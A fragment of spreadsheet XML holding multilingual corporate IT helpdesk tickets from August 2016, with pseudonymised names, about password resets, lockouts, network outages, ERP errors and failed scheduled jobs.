    <t>qwynjdbk eamnvwyh</t>
  </si>
  <si>
    <t>circuit outage  : traversecity : static-vpn-4331-rtr02 down since 8/25/2016 1:00 am est (site up on primary)</t>
  </si>
  <si>
    <t>what type of outage:  _____network     ___x__circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ______yes___     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   _______8/25/2016 1:00 am est_______________x000D_
_x000D_
3.  scheduled maintenance ( power) ? ____no___    (yes/no/na)     company power  _________     provider power __________x000D_
                _x000D_
4.  scheduled maintenance ( network) ? _no______    (yes/no/na)     company maint________ (yes/no)       provider maint/ticket #__________________    _x000D_
_x000D_
5. does site have a backup circuit ?  __yes____    (yes/no/na) _x000D_
_x000D_
6. backup circuit active ?   ___yes____     (yes/no/na) _x000D_
_x000D_
7. site contact notified (phone/email) ?  ____yes_____     (yes/no/na) _x000D_
_x000D_
8. remote dial-in ?   _____na______   (yes/no/na) _x000D_
_x000D_
9. equipment reset ?    ______na_____    (yes/no/na) _x000D_
_x000D_
10. verified site working on backup circuit ?  ___yes____     (yes/no/na) _x000D_
_x000D_
11. vendor ticket  # ( global_telecom_1, verizon, telecom_vendor_1, telecom_vendor_2 )    ___________na______________       _x000D_
_x000D_
12. notified  gsc  __yes______     (yes/no/na)    cert started  ?________    (yes/no/na) _x000D_
_x000D_
13.  additional diagnostics</t>
  </si>
  <si>
    <t>uxgrdjfc kqxdjeov</t>
  </si>
  <si>
    <t>change of  computer to user parrfgyksm - telephony_software set up change</t>
  </si>
  <si>
    <t>please set up new computer changed to user parrfgyksm.</t>
  </si>
  <si>
    <t>mp_fb   konto gesperrt</t>
  </si>
  <si>
    <t>keine anmeldung mÃ¶glich</t>
  </si>
  <si>
    <t>lqjoagzt gqueiatx</t>
  </si>
  <si>
    <t>keine netzwerkverbindung</t>
  </si>
  <si>
    <t>eemw8144234 keine netzwerkverbindung kÃ¶nnen hergestellt werden</t>
  </si>
  <si>
    <t>jbifdshu jzercpoq</t>
  </si>
  <si>
    <t>email queries</t>
  </si>
  <si>
    <t xml:space="preserve">erp SID_34 lock out issue and password reset </t>
  </si>
  <si>
    <t xml:space="preserve">erp SID_34 lock out issue and password reset user id : bhergtyemm </t>
  </si>
  <si>
    <t>aw: please take this survey related to ticket_no0433553</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: tgpvrbyi.ztdxwpcn@gmail.com
sehr geehrter hr. souzarft,
noch immer kein zugriff.
freundliche grÃ¼ÃŸe/ best </t>
  </si>
  <si>
    <t>can't copy/save pdf of drawing from business_client</t>
  </si>
  <si>
    <t xml:space="preserve">application used to work till aug 23. user was able to copy / save pdf from business_client. since aug 24th user wasn't able anymore. </t>
  </si>
  <si>
    <t>kein zugriff auf server mÃ¶glich!</t>
  </si>
  <si>
    <t>meldung: fehler bei der erneuten verbindungsherstellung von ...: mit \\HostName_579\.....</t>
  </si>
  <si>
    <t xml:space="preserve"> authorization add/delete members</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>hpmwliog kqtnfvrl</t>
  </si>
  <si>
    <t>unable to open outlook client</t>
  </si>
  <si>
    <t>jxpmkhay ruvnpyqb</t>
  </si>
  <si>
    <t>aw: please take this survey related to ticket_no0433617</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: efjzbtcm.mdpviqbf@gmail.com
nein funktioniert noch nicht
efjzbtcm mdpviqbf
company productions gmbh &amp; co. kg
versand/logistik/ff-wear
email: efjzbtcm.mdpviqbf@gmail.com&lt;mailto:efjzbtcm.mdpviqbf@gmail.com&gt;
company produktions gmbh &amp; co. kg
geschÃ¤ftsfÃ¼hrer: phvkowml azbtkqwx, naruedlk mpvhakdq
von: global it ticketing_tool [mailto:company@ticketing_tool.com]
gesendet: mittwoch, 24. august 2016 22:02
an: efjzbtcm mdpviqbf
betreff: please take this survey related to ticket_no1544728
please do not reply to or forward this email. use ticketing_tool to open a new ticket.
we value your input. please help us by taking the time to fill out this short survey.
click here to take the survey&lt;
________________________________
number: ticket_no1544728
resolved by: olckhmvx pcqobjnd
short description: beim Ã¶ffnen oder speichern kommt immer wieder eine meldung
click here to view: link&lt;
________________________________
comments:
________________________________
08-24-2016 16:00:58 edt - olckhmvx pcqobjndadditional comments
hallo frau maier,
bitte probieren sie jetzt und geben sie bescheid ob sie zugriff haben oder nicht.
mfg,
dan
gso</t>
  </si>
  <si>
    <t>collaboration_platform for business not sync</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: eylqgodm.ybqkwiam@gmail.com_x000D_
_x000D_
collaboration_platform for business dose not take my credentials to sync_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>one user cannot receive e-mail from bank of amrice, cashpro online</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: uagqromi.sqgtkmci@gmail.com_x000D_
_x000D_
hi,_x000D_
_x000D_
shunshen.wanrtyg@company.com&lt;mailto:shunshen.wanrtyg@company.com&gt;_x000D_
_x000D_
cannot receive e-mail from bank of amrice, cashpro online.  mr. wanrtyg is a partner member, but other partner staffs receive mails from bank.  please resolve._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>profile and email client setup</t>
  </si>
  <si>
    <t xml:space="preserve">ghkkytu,_x000D_
  configure user login for below e-mail details, </t>
  </si>
  <si>
    <t>os reinstall</t>
  </si>
  <si>
    <t xml:space="preserve">os installation </t>
  </si>
  <si>
    <t>reimage the laptop</t>
  </si>
  <si>
    <t>os installation</t>
  </si>
  <si>
    <t>os reinstallation on e6420 laptop.</t>
  </si>
  <si>
    <t>abend batch job Job_1967e</t>
  </si>
  <si>
    <t>job name: Job_1967e  abended.</t>
  </si>
  <si>
    <t>inwarehouse_tool not creating</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: uisewznr.ewtmkphs@gmail.com_x000D_
_x000D_
hi team,_x000D_
_x000D_
delivery # 9168077553 is not creating an inwarehouse_tool and i cannot see any reason why it is not creating. can you please resolve this issue? </t>
  </si>
  <si>
    <t>cvnzhbfa qcvzyrgo</t>
  </si>
  <si>
    <t>vip 2: login issue</t>
  </si>
  <si>
    <t>login issue_x000D_
-checked the user name in ad and unlocked the account._x000D_
-advised the user to login and check._x000D_
-caller confirmed that he was able to login._x000D_
-issue resolved.</t>
  </si>
  <si>
    <t>voalfshq eihcmgnl</t>
  </si>
  <si>
    <t>my global_telecom_1 two in one can't be connected.  there is signal but "limited".</t>
  </si>
  <si>
    <t>name:lertfty zuothryrt
language:
browser:microsoft internet explorer
email:kirtyrghwc.ykjrbivs@gmail.com
customer number:
telephone:
summary:my global_telecom_1 two in one can't be connected.  there is signal but "limited".</t>
  </si>
  <si>
    <t>kilrghwc ykjrbivs</t>
  </si>
  <si>
    <t>folder access to \\HostName_717\teams\kvp3-projekte</t>
  </si>
  <si>
    <t>permission: write and read_x000D_
_x000D_
location: germany</t>
  </si>
  <si>
    <t>mii password reset for wiggrtgyis</t>
  </si>
  <si>
    <t>sbgfycot quhzgatm</t>
  </si>
  <si>
    <t xml:space="preserve">HostName_1010(erp search_server server): erpstartsrv.exe service is down </t>
  </si>
  <si>
    <t>vtykrubi whsipqno's title</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: hkrecpfv.kgwpbexv@gmail.com
good afternoon.  i noticed that rtgyon's title is incorrect in skype.  who can correct it?  he is not chairman of company, just president and ceo.
[cid:image001.png@01d1fe24.eaf9c410]
</t>
  </si>
  <si>
    <t>what is this trailing mail?</t>
  </si>
  <si>
    <t>i'm using collaboration_platform in crm. why are all my collaboration_platform notebooks shared with +20 people i don't know and dind't share my noteb</t>
  </si>
  <si>
    <t>all my collaboration_platform notebooks are shared with +20 people i don't know. i did not share my notebook with them and i cannot remove their shared status ! how is this possible???</t>
  </si>
  <si>
    <t>error on erp</t>
  </si>
  <si>
    <t>khufscza qoixpave</t>
  </si>
  <si>
    <t>qkvzexta ehlvgouc</t>
  </si>
  <si>
    <t>need to see all unread emails</t>
  </si>
  <si>
    <t>do not have access to bobj</t>
  </si>
  <si>
    <t>dymwulbi dkbvqhna</t>
  </si>
  <si>
    <t>multiple pages print while printing single email.</t>
  </si>
  <si>
    <t xml:space="preserve">multiple pages print while printing single email.
-checked the driver settings and updated the printer drivers.
-abl eto print single word, excel, pdf documents.
-when the user tries to print any email from the outlook, it shows multiple pages.
-see attachment=== 
=231
</t>
  </si>
  <si>
    <t>how to delay email sending?</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: iygsxftl.hysrbgad@gmail.com_x000D_
_x000D_
dear all,_x000D_
_x000D_
please can you explain how to delay email sending? this was possible with my earlier outlook version._x000D_
_x000D_
[cid:image005.jpg@01d1fe48.23ed4df0]_x000D_
_x000D_
with my current version 'outlook 2013' the delayed sending does not work if my computer and outlook are shut down. email will be sent only when i will restart outlook._x000D_
_x000D_
[cid:image006.jpg@01d1fe48.23ed4df0]_x000D_
_x000D_
is there any chance to fix this?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>add role to access e-recruit</t>
  </si>
  <si>
    <t xml:space="preserve">hi,
please also add (er:rcf_recruiter) role to imzctxhr odmawbij and jusfrttin gtehdnyuerrf also.
</t>
  </si>
  <si>
    <t>skype login issue</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: crkdjbot.qiztrxne@gmail.com
helloâ€¦ i have been unable to sign into skype for several days.
[cid:image001.png@01d1fe15.30402581]
best,
debgrtybie savgrtyuille
sr. corporate paralegal
crkdjbot.qiztrxne@gmail.com&lt;mailto:crkdjbot.qiztrxne@gmail.com&gt;
</t>
  </si>
  <si>
    <t>HostName_184: volume: /dev/software on server: HostName_184 is over 85% space consumed.remaining only 15%</t>
  </si>
  <si>
    <t>HostName_1132:oracle finance_app financial management - web tier/ java server (epmsystem2) - service monitor</t>
  </si>
  <si>
    <t>HostName_1132:oracle finance_app financial management - web tier (epmsystem2) - service monitor(down)_x000D_
HostName_1132:oracle finance_app financial management - java server (epmsystem2) - service monitor</t>
  </si>
  <si>
    <t>a link on an e-mail says i am "forbidden"</t>
  </si>
  <si>
    <t>an e-mail from  it training has email hints and tips #1.  under "create signature" it has a link "company formatheywting standard" that i am forbidden to see.
615</t>
  </si>
  <si>
    <t>GRP_70</t>
  </si>
  <si>
    <t>there were 3 undeliverable e-mails returned with a ethics e-mail request.</t>
  </si>
  <si>
    <t xml:space="preserve">there were 3 undeliverable e-mails returned with a ethics e-mail request._x000D_
_x000D_
hello,_x000D_
_x000D_
there were 3 undeliverable e-mails returned with a ethics e-mail request._x000D_
_x000D_
please advise._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>erp round off on total</t>
  </si>
  <si>
    <t xml:space="preserve">we entered so 35941677, total of order should be $1,150.50 but erp is rounding it off to $1,151.70  it is creating a 20 cent difference.  this order is one of few and is causing quite a bit of re-invoicing and payment rejections.  </t>
  </si>
  <si>
    <t>scrap reason code (two issues)</t>
  </si>
  <si>
    <t xml:space="preserve">two issues:_x000D_
1. mii asks for a reason code when scrap quantity is entered as zero. most operator put zero to be sure that they're not entering any scrap. intended behavior is that if scrap field is blank or has zero, system shouldn't ask for scrap reason code_x000D_
2. if we enter invalid reason code, the save button is disabled after warning message - so operator can't fix invalid data but has to close the confirmation window, type information again and then enter - can we fix this? </t>
  </si>
  <si>
    <t>instalaÃ§Ã£o guardiÃ£o (banco hsbc)</t>
  </si>
  <si>
    <t>gentileza, instalar o guardiÃ£o do banco hsbc para utilizaÃ§Ã£o de transaÃ§Ãµes pela internet.</t>
  </si>
  <si>
    <t>btxfwisc mapbkflt</t>
  </si>
  <si>
    <t>user called to know if there was an outage in usa</t>
  </si>
  <si>
    <t xml:space="preserve">job jobuacyltoe hxgaycze failed in job_scheduler at: 08/24/2016 13:01:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job jobuacyltoe hxgaycze failed in job_scheduler at: 08/24/2016 13:01:00</t>
  </si>
  <si>
    <t xml:space="preserve">job jobuacyltoe hxgaycze failed in job_scheduler at: 08/24/2016 12:56:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job jobuacyltoe hxgaycze failed in job_scheduler at: 08/24/2016 12:56:00</t>
  </si>
  <si>
    <t xml:space="preserve">job HostName_1019failagain_1 failed in job_scheduler at: 08/24/2016 12:56:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job HostName_1019failagain_1 failed in job_scheduler at: 08/24/2016 12:56:00</t>
  </si>
  <si>
    <t xml:space="preserve">svc-now ticket found... doing nothing  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
svc-now ticket found... doing nothing</t>
  </si>
  <si>
    <t xml:space="preserve">unlocked all accounts on password manager </t>
  </si>
  <si>
    <t>unable to open originals from engineering tool</t>
  </si>
  <si>
    <t>when opening originals from engineering tool, below error occurs._x000D_
_x000D_
process: _x000D_
fetch originals from erp system._x000D_
_x000D_
[jco3 - error]</t>
  </si>
  <si>
    <t>cannot get access to email</t>
  </si>
  <si>
    <t>same issue as yesterday, it called and fixed the issue, but back to work today and still cannot get into email</t>
  </si>
  <si>
    <t>unable to log in to netweaver</t>
  </si>
  <si>
    <t>request to reset microsoft online services password for jcsmxrgl.ibhsnket@gmail.com</t>
  </si>
  <si>
    <t>ticket update on ticket_no0409509</t>
  </si>
  <si>
    <t>ticket update on inplant_853640</t>
  </si>
  <si>
    <t>reset the password for igkqpndy swqndxhl on other / telephony_software</t>
  </si>
  <si>
    <t xml:space="preserve">hello,_x000D_
_x000D_
please reset password for user duffym, as she has forgotten it and therefore cannot log into her interaction desktop. please provide magdalena with the new password._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>igkqpndy swqndxhl</t>
  </si>
  <si>
    <t>ticket update inplant_853261</t>
  </si>
  <si>
    <t>request to reset microsoft online services password for rovsabyl.idpvbjtw@gmail.com</t>
  </si>
  <si>
    <t>rovsabyl idpvbjtw</t>
  </si>
  <si>
    <t>we are currently unable to post inwarehouse_tool doc. # 6223592434 for po 5616473800. please advice how to proceed.</t>
  </si>
  <si>
    <t>dmlnpgkv ophsnmbr</t>
  </si>
  <si>
    <t xml:space="preserve">job HostName_1019failagain failed in job_scheduler at: 08/24/2016 11:05:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job HostName_1019failagain failed in job_scheduler at: 08/24/2016 11:05:00</t>
  </si>
  <si>
    <t xml:space="preserve">job HostName_1019fail failed in job_scheduler at: 08/24/2016 11:02:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job HostName_1019fail failed in job_scheduler at: 08/24/2016 11:02:00</t>
  </si>
  <si>
    <t>ticket update on ticket_no0433651</t>
  </si>
  <si>
    <t xml:space="preserve">mailbox configuration </t>
  </si>
  <si>
    <t xml:space="preserve">
received from: sylvthryia.sidor@company.com
good afternoon,
i am writing to ask about a few things regarding my new mailbox.
1. the name in the email address (sylvthryia) is incorrect; can it be amended to sylvthryia (with w)?
2. is it possible to change my password? i tried to do this online in the application, but it states that it is impossible.
3. i would like to be able to access my mailbox using software (ms office 2013). if it is possible, what would be the configuration data to be used?
4. i would like to update my signature. could you please advise where this can be done?
</t>
  </si>
  <si>
    <t>aqmwpyxk alebcyor</t>
  </si>
  <si>
    <t>user unable to log onto ticketing_tool!</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: kxsceyzo.naokumlb@gmail.com
userid: hntubjela
name nivqoxyt ivrhjmnx
user is unable to create ticketing_tool tickets!
</t>
  </si>
  <si>
    <t>tool repoter</t>
  </si>
  <si>
    <t xml:space="preserve">from: nwfodmhc exurcwkm 
sent: wednesday, august 24, 2016 8:17 pm
to: 'srujan enterprises'; nwfodmhc exurcwkm
cc: avsbdhyu sahryu; sihtvocw yspnqxgw
subject: re: engineering tool
hi
please go through the attachment and configure accordingly.
please contact us back if you still face any issue.
</t>
  </si>
  <si>
    <t xml:space="preserve">job HostName_1019fail failed in job_scheduler at: 08/24/2016 10:46:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job HostName_1019fail failed in job_scheduler at: 08/24/2016 10:46:00</t>
  </si>
  <si>
    <t>computer lrrw8514654 -  us_plant location252</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: dpuifqeo.eglwsfkn@gmail.com
user â€“ bghrbie crhyley â€“ has this issue:
excel isn't working properly. it keeps going to not responding.
i have restarted several times to correct that. now if i work on a spreadsheet,
save it and minimize it i can't open it back up. i have had to restart the computer and
open excel again to get to the worksheet. this has happened twice. do you have any ideas i could try?
</t>
  </si>
  <si>
    <t xml:space="preserve">from: nwfodmhc exurcwkm _x000D_
sent: wednesday, august 24, 2016 8:11 pm_x000D_
to: 'frederirtck.gtehdnyu@company.com'_x000D_
cc: tiyhum kuyiomar_x000D_
subject: request to reset microsoft online services password for frederirtck.gtehdnyu@company.com_x000D_
_x000D_
hi,_x000D_
_x000D_
please change your password in : _x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>jdeoycaq geqctmlh</t>
  </si>
  <si>
    <t>usa print check</t>
  </si>
  <si>
    <t>urgent: only the highlighted (attachment) are showing up in 'my active accounts' in crm</t>
  </si>
  <si>
    <t>only the highlighted (attachment) are showing up in 'my active accounts' in crm
phone; 309</t>
  </si>
  <si>
    <t>HostName_145 (erp SID_28): volume: /dev/hd3 on server is over 85% space consumed. space available: 257mb</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1953b failed in job_scheduler at: 08/24/2016 10:24:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1953b failed in job_scheduler at: 08/24/2016 10:24:00</t>
  </si>
  <si>
    <t>ouymgzat jfzmeaoy</t>
  </si>
  <si>
    <t>unable to attach a document in erp</t>
  </si>
  <si>
    <t>netweaver is locked out.</t>
  </si>
  <si>
    <t>pbdtxowu yfqzibtv</t>
  </si>
  <si>
    <t>telephony_software software not configured</t>
  </si>
  <si>
    <t>ticket update on ticket_no0432827</t>
  </si>
  <si>
    <t xml:space="preserve">cleared skype cache files </t>
  </si>
  <si>
    <t>unknown request for guest wireless access</t>
  </si>
  <si>
    <t xml:space="preserve">hello,_x000D_
i had never used the guest wireless access system before. today when i entered, i saw an entry in pending accounts which i'm not familiar with (please check the attached screenshot). can this be a security threat? can you please investigate?_x000D_
</t>
  </si>
  <si>
    <t>yabnljgs cjlgetqz</t>
  </si>
  <si>
    <t xml:space="preserve">fi/co issue - sto 5019143086 </t>
  </si>
  <si>
    <t xml:space="preserve">please review sto 5019143086 .  user is receiving the error message below to "please enter net price".  there is no average customer net price for this material (vk13 - ztfn), so erp should be simulating a transfer price for the material but it does not appear to be doing so.  _x000D_
_x000D_
 _x000D_
sender reciever material created quantity  requsted quantity  sto number error code_x000D_
plant_105 plant_101 2355391                  3            please enter net price_x000D_
</t>
  </si>
  <si>
    <t>install engineering_tool</t>
  </si>
  <si>
    <t>der netweaver business client 5.0 kann nicht gestartet werden.</t>
  </si>
  <si>
    <t>ejcylstw gdvzkihe</t>
  </si>
  <si>
    <t>EU_tool -&gt; sinterleitstand (sls) -&gt; beilageproben -&gt; auswerten, form "beilage und tms proben", input of ald2 and ald3 data</t>
  </si>
  <si>
    <t>currently it is impossible to enter data of cycles of the following the furnaces: ald2 and ald3_x000D_
_x000D_
same as  - ticket_no0414688</t>
  </si>
  <si>
    <t>jhunextz zorxpwkt</t>
  </si>
  <si>
    <t xml:space="preserve">account getting locked on windows </t>
  </si>
  <si>
    <t>mtukbcow xfdtukjm</t>
  </si>
  <si>
    <t>lunch rm computer down</t>
  </si>
  <si>
    <t>the employee computer in mfg #1 lunch rm. is down</t>
  </si>
  <si>
    <t>delivery notes - unable to inwarehouse_tool four deliveries.  error indicates a block. no block on orders</t>
  </si>
  <si>
    <t>deliveries mentioned below are not invoicing.   try to do it manual under vf01.  errors were:   the billing type could not be determined, block for billing, the item is not relevant for billing.  _x000D_
9168911759_x000D_
8057800533_x000D_
9168911663_x000D_
8057800653_x000D_
9168911772_x000D_
8057800687_x000D_
9165515998_x000D_
_x000D_
need resolved before month end.     any questions please contact ibtvlfah dtlwscma 479-633-6608</t>
  </si>
  <si>
    <t xml:space="preserve">HostName_108 (plm conversion server - kirty):  alwaysupservice.exe process count service is down </t>
  </si>
  <si>
    <t xml:space="preserve">unable to access n drive </t>
  </si>
  <si>
    <t>yqshfmvi jwyrmlbz</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1314 failed in job_scheduler at: 08/24/2016 08:45:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1314 failed in job_scheduler at: 08/24/2016 08:45:00</t>
  </si>
  <si>
    <t>background jobs in erp inbox will not export into excell after gui upgrade</t>
  </si>
  <si>
    <t>sa38 reports that are scheduled to run as a background job, show up in the erp inbox.  they allow you to open them and show the data is transmitted.  however, excell hangs up and no data shows.   this did not occur until the upgrade occurred.  i have already logged totally out of erp and logged in again to see if that correct the situation with no success</t>
  </si>
  <si>
    <t>attendance_tool intouch clocks - shows as down in application</t>
  </si>
  <si>
    <t>keine verbindung zum server</t>
  </si>
  <si>
    <t>keine verbindung zum server, kein zugriff auf laufwerke in germany</t>
  </si>
  <si>
    <t>laptop crash</t>
  </si>
  <si>
    <t>Israel, israel - (company):company-eu-isr--mainswitch-b-3560-access-sw02 is down since at 08:11 am et on  08/24</t>
  </si>
  <si>
    <t>EMEA, israel - (company):company-eu-isr--mainswitch-b-3560-access-sw02 is down since at 08:11 am et on 08/24</t>
  </si>
  <si>
    <t>server for public folder in germany is not available</t>
  </si>
  <si>
    <t>\\HostName_598\public is not available._x000D_
is there are new server name for germany or just an network issue?_x000D_
when could this be solved?</t>
  </si>
  <si>
    <t>tengigabitethernet1/5 Â· connection to tech-4500x (a) - (10.1.200.2) is down on top-6509-msfc720.</t>
  </si>
  <si>
    <t>completed order 32079269 form 2014 for vw is visible on md04, mm 3967345</t>
  </si>
  <si>
    <t>hello,_x000D_
there is completed order 32079269 form 2014 for vw visible on md04, mm 4078456, please see attachments.</t>
  </si>
  <si>
    <t>audio not working laptop - error no device installed error</t>
  </si>
  <si>
    <t>computer name  : agvl8325581
service tag :  j6gqbt1
phone: 05450</t>
  </si>
  <si>
    <t>oirxvhbp zltpgvbk</t>
  </si>
  <si>
    <t>collaboration_platform is not openning.</t>
  </si>
  <si>
    <t>folder access</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: qhvspezr.fvluqczd@gmail.com
hi
please get tghrloks jbgcvlmf tghrloks.jbgcvlmf@gmail.com&lt;mailto:tghrloks.jbgcvlmf@gmail.com&gt; ( user id : nuerthytzg ) access to below folder location .
\\HostName_95\teams\globalengservices\9tcb_nc\&lt;file:///\\HostName_95\teams\globalengservices\9tcb_nc\&gt;
with warm </t>
  </si>
  <si>
    <t>qhvspezr fvluqczd</t>
  </si>
  <si>
    <t>reparo pdf creator</t>
  </si>
  <si>
    <t>favor reparar o pdf creator, quando vou imprimir o recibo da gia sp em pdf estÃ¡ saindo somente caracteres.</t>
  </si>
  <si>
    <t>top urgent request les team: change back kis inwarehouse_tool sender address of  sales orgr 1278 from germany to fÃ¼rth</t>
  </si>
  <si>
    <t xml:space="preserve">subject: wrong address on kis inwarehouse_tools for salsed org 1278_x000D_
importance: high_x000D_
_x000D_
kis commercial inwarehouse_tools for sales org 1278 print wrong sender address, which cause legal compliance error with german customs.  _x000D_
revers 1278  sales org address to company infrastruture gmbh, wehlauerstr. 73,  90766 germany  today!!!_x000D_
_x000D_
please confrim estimated time of change  in SID_34 system aspap. _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_41arc2 failed in job_scheduler at: 08/24/2016 07:04:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_41arc2 failed in job_scheduler at: 08/24/2016 07:04:00</t>
  </si>
  <si>
    <t>not able to save files on HostName_776</t>
  </si>
  <si>
    <t>not able to save files on HostName_776. there were reporting reports to be saved.</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_26arc2 failed in job_scheduler at: 08/24/2016 06:58:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_26arc2 failed in job_scheduler at: 08/24/2016 06:58:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1953a failed in job_scheduler at: 08/24/2016 06:52:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1953a failed in job_scheduler at: 08/24/2016 06:52:00</t>
  </si>
  <si>
    <t>vpn not accepting password</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: vfoyenlw.ntpbdeyf@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
i am unable to login vpn._x000D_
it's showing user name and password not matching. it is not accepting my current password._x000D_
_x000D_
i checked the password and it is okay._x000D_
_x000D_
please help me to resolve the issue._x000D_
_x000D_
with </t>
  </si>
  <si>
    <t xml:space="preserve">job Job_714 failed in job_scheduler at: 08/24/2016 06:53:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_714 failed in job_scheduler at: 08/24/2016 06:53:00</t>
  </si>
  <si>
    <t xml:space="preserve">HostName_521: alwaysupservice.exe: wrong number of instances of process alwaysupservice.exe, </t>
  </si>
  <si>
    <t>HostName_521: alwaysupservice.exe: wrong number of instances of process alwaysupservice.exe, expected instances gte 5 but found 4</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_44arc2 failed in job_scheduler at: 08/24/2016 06:31:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_44arc2 failed in job_scheduler at: 08/24/2016 06:31:00</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_35arc2 failed in job_scheduler at: 08/24/2016 06:22:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_35arc2 failed in job_scheduler at: 08/24/2016 06:22:00</t>
  </si>
  <si>
    <t>cert notification - network outage at germany (formerly germany)</t>
  </si>
  <si>
    <t xml:space="preserve">what is the issue? unplanned network outage at germany site (formerly germany) - all network resources including telephony_software services, and the phone number for gso emea () are unavailable at the moment. a fiber cut in the vicinity of the site has caused the issue. german telekom has been contacted after the fault was identified, and services are expected to be restored at 7:30 am edt.
when did it start? 24 august 2016, 3:30 am edt
what is the estimated time to recovery?  unknown at this time.
who and what are affected?  all intranet and internet resources including telephone services at the site are affected
are there any known workarounds?  no workarounds available at the moment.
what is the cause?  suspected fiber cut
questions? global service organization
a leadership bridge line has been established in order to provide more timely updates to you.  this line is open to all business unit representatives, as well as, it management.
leadership bridge line will be open at 6:55 am edt
leadership bridge line
</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3049 failed in job_scheduler at: 08/24/2016 06:17:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3049 failed in job_scheduler at: 08/24/2016 06:17:00</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_23arc2 failed in job_scheduler at: 08/24/2016 06:15:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_23arc2 failed in job_scheduler at: 08/24/2016 06:15:00</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_31arc2 failed in job_scheduler at: 08/24/2016 06:09:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_31arc2 failed in job_scheduler at: 08/24/2016 06:09:00</t>
  </si>
  <si>
    <t>no access to bobs</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ufebvyzx.gzahomlv@gmail.com_x000D_
_x000D_
hello , i have no accesss to bobj_x000D_
_x000D_
need help_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>ufebvyzx gzahomlv</t>
  </si>
  <si>
    <t>interface fastethernet0/27-vlan 51-lhqwx402189sf on company-na-usa-usa-switch-cl04-3-2960-access-sw03 is down</t>
  </si>
  <si>
    <t>zugriff auf netzlaufwerke</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: sthqwdpj.lpnigfyq@gmail.com_x000D_
_x000D_
hallo,_x000D_
_x000D_
seit dem ich mein passwort geÃ¤ndert habe, habe ich keinen zugriff auf die netzlaufwerke._x000D_
vpn funktioniert glaube ich nicht richtig._x000D_
_x000D_
danke fÃ¼r ihre unterstÃ¼tzung._x000D_
_x000D_
_x000D_
mit freundlichen grÃ¼ÃŸen |  best </t>
  </si>
  <si>
    <t>sthqwdpj lpnigfyq</t>
  </si>
  <si>
    <t>login error</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: nbdljruw.axcrspyh@gmail.com_x000D_
_x000D_
hallo zusammen,_x000D_
_x000D_
beim einloggen mit dem password_management_tool password manager, wurde mir das konto erneut gesperrt._x000D_
bitte erneut freischalten &amp; ein gÃ¼ltiges password zur anmeldung._x000D_
mir war nicht klar welches password ich verwenden soll._x000D_
_x000D_
mit freundlichen grÃ¼ÃŸen / best </t>
  </si>
  <si>
    <t>ticket update - inplant_852115</t>
  </si>
  <si>
    <t xml:space="preserve">ic_x000D_
 welcome, our next available agent will be with you shortly..._x000D_
 interaction alerting agent._x000D_
 website visitor has joined the conversation_x000D_
zheqafyo bqirpxag_x000D_
 hi_x000D_
ayrhcfxi zartupsw_x000D_
 hello paneer_x000D_
 </t>
  </si>
  <si>
